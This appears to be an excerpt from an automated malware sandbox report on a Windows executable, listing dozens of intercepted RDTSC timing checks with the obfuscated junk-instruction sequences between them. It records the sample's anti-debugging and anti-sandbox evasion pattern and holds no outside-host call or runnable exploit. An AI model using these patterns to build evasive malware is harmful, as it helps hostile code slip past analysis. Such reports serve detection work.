                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 529094B second address: 5290972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE311181225h 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5290972 second address: 52909D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE310CDC3A7h 0x00000008 mov dh, cl 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FE310CDC3A2h 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 mov esi, 69B6710Dh 0x0000001a jmp 00007FE310CDC39Ah 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE310CDC3A7h 0x00000029 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52909D1 second address: 52909E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE311181224h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52909E9 second address: 52909ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E02DC second address: 52E02E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E02E2 second address: 52E02E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E02E6 second address: 52E031A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, di 0x0000000f pushfd 0x00000010 jmp 00007FE31118121Fh 0x00000015 jmp 00007FE311181223h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E031A second address: 52E0340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E0340 second address: 52E034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE31118121Bh 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52E034F second address: 52E03AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FE310CDC39Eh 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FE310CDC39Dh 0x0000001c add esi, 5B35A6B6h 0x00000022 jmp 00007FE310CDC3A1h 0x00000027 popfd 0x00000028 mov ax, E4A7h 0x0000002c popad 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52509C7 second address: 52509D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52509D6 second address: 52509DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52509DC second address: 52509E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52509E0 second address: 52509F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE310CDC39Dh 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52509F8 second address: 5250A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FE31118121Ch 0x00000010 pushfd 0x00000011 jmp 00007FE311181222h 0x00000016 jmp 00007FE311181225h 0x0000001b popfd 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov esi, 5F3FD43Fh 0x00000026 mov eax, 5F67755Bh 0x0000002b popad 0x0000002c push dword ptr [ebp+04h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A5D second address: 5250A63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A63 second address: 5250A82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A82 second address: 5250A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A88 second address: 5250A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A8E second address: 5250A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250A92 second address: 5250AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE311181224h 0x00000014 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250AB5 second address: 5250ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5250B41 second address: 5250B48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ADh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5290671 second address: 52906A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FE310CDC3A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52906A1 second address: 529071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FE31118121Fh 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE311181226h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov edx, 78C10E20h 0x00000019 popad 0x0000001a pop ebp 0x0000001b pushad 0x0000001c call 00007FE311181225h 0x00000021 pushfd 0x00000022 jmp 00007FE311181220h 0x00000027 xor cl, FFFFFF98h 0x0000002a jmp 00007FE31118121Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FE31118121Fh 0x00000038 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D09E3 second address: 52D09FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, 9AF7h 0x00000013 mov esi, 0869EF93h 0x00000018 popad 0x00000019 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D08C9 second address: 52D08DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE311181222h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D08DF second address: 52D08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE310CDC39Dh 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D08F7 second address: 52D0929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE311181228h 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0929 second address: 52D092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D092D second address: 52D0933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0933 second address: 52D0944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0944 second address: 52D0981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE311181227h 0x0000000a or ecx, 4DCB694Eh 0x00000010 jmp 00007FE311181229h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0981 second address: 52D0991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC39Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0991 second address: 52D0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06BF second address: 52D06F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE310CDC3A6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE310CDC39Eh 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06F6 second address: 52D06FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06FC second address: 52D0700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0700 second address: 52D0704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0704 second address: 52D072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE310CDC3A9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D072E second address: 52D0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0732 second address: 52D0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0738 second address: 52D073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D073E second address: 52D0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0C97 second address: 52D0C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0C9C second address: 52D0D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FE310CDC39Eh 0x00000010 mov ch, 6Ah 0x00000012 pop edx 0x00000013 pushfd 0x00000014 jmp 00007FE310CDC39Ch 0x00000019 adc cx, 92D8h 0x0000001e jmp 00007FE310CDC39Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE310CDC39Fh 0x0000002d or ah, FFFFFF9Eh 0x00000030 jmp 00007FE310CDC3A9h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FE310CDC3A0h 0x0000003c adc ax, D798h 0x00000041 jmp 00007FE310CDC39Bh 0x00000046 popfd 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 pushad 0x0000004a mov edx, ecx 0x0000004c mov bl, ch 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 jmp 00007FE310CDC3A3h 0x00000056 mov eax, dword ptr [ebp+08h] 0x00000059 pushad 0x0000005a movzx eax, bx 0x0000005d call 00007FE310CDC3A1h 0x00000062 mov ah, 92h 0x00000064 pop edi 0x00000065 popad 0x00000066 and dword ptr [eax], 00000000h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D79 second address: 52D0D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D7D second address: 52D0D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D92 second address: 52D0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FE311181223h 0x00000015 pop esi 0x00000016 call 00007FE311181229h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52808AC second address: 5280922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ch 0x0000000d call 00007FE310CDC3A9h 0x00000012 jmp 00007FE310CDC3A0h 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FE310CDC3A0h 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FE310CDC3A0h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280922 second address: 528093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0CFA second address: 52C0D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FE310CDC39Eh 0x0000000c adc eax, 6B3D09E8h 0x00000012 jmp 00007FE310CDC39Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FE310CDC39Fh 0x00000023 and al, 0000002Eh 0x00000026 jmp 00007FE310CDC3A9h 0x0000002b popfd 0x0000002c call 00007FE310CDC3A0h 0x00000031 pushfd 0x00000032 jmp 00007FE310CDC3A2h 0x00000037 xor eax, 747F41D8h 0x0000003d jmp 00007FE310CDC39Bh 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 xchg eax, ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ecx 0x0000004a pop edx 0x0000004b mov al, 10h 0x0000004d popad 0x0000004e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0D93 second address: 52C0DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FE311181221h 0x00000019 pop esi 0x0000001a pushfd 0x0000001b jmp 00007FE311181221h 0x00000020 xor si, 5C36h 0x00000025 jmp 00007FE311181221h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0DF4 second address: 52C0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0B7E second address: 52D0B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0545 second address: 52A0555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC39Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0555 second address: 52A0590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE311181226h 0x00000011 push eax 0x00000012 jmp 00007FE31118121Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0590 second address: 52A0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0594 second address: 52A05AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05AF second address: 52A05E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007FE310CDC3A0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE310CDC3A7h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05E3 second address: 52A05E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05E9 second address: 52A0600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE310CDC39Ah 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0600 second address: 52A0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0606 second address: 52A060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260056 second address: 526005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526005A second address: 5260060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260060 second address: 5260128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE31118121Ch 0x00000009 sub cx, B068h 0x0000000e jmp 00007FE31118121Bh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FE311181225h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007FE31118121Eh 0x00000026 mov ebp, esp 0x00000028 jmp 00007FE311181220h 0x0000002d and esp, FFFFFFF8h 0x00000030 pushad 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 pushad 0x00000034 mov ax, B93Bh 0x00000038 movzx ecx, di 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e movzx esi, di 0x00000041 pushfd 0x00000042 jmp 00007FE311181225h 0x00000047 jmp 00007FE31118121Bh 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FE31118121Bh 0x00000058 or esi, 684E847Eh 0x0000005e jmp 00007FE311181229h 0x00000063 popfd 0x00000064 push eax 0x00000065 pop ebx 0x00000066 popad 0x00000067 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260128 second address: 526012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526012E second address: 526016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FE311181226h 0x00000011 push eax 0x00000012 jmp 00007FE31118121Bh 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov cl, C6h 0x0000001b pushad 0x0000001c mov eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526016F second address: 526018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+10h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE310CDC3A1h 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526018D second address: 5260193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260193 second address: 52601BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FE310CDC3A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601BC second address: 52601C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601C2 second address: 52601C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
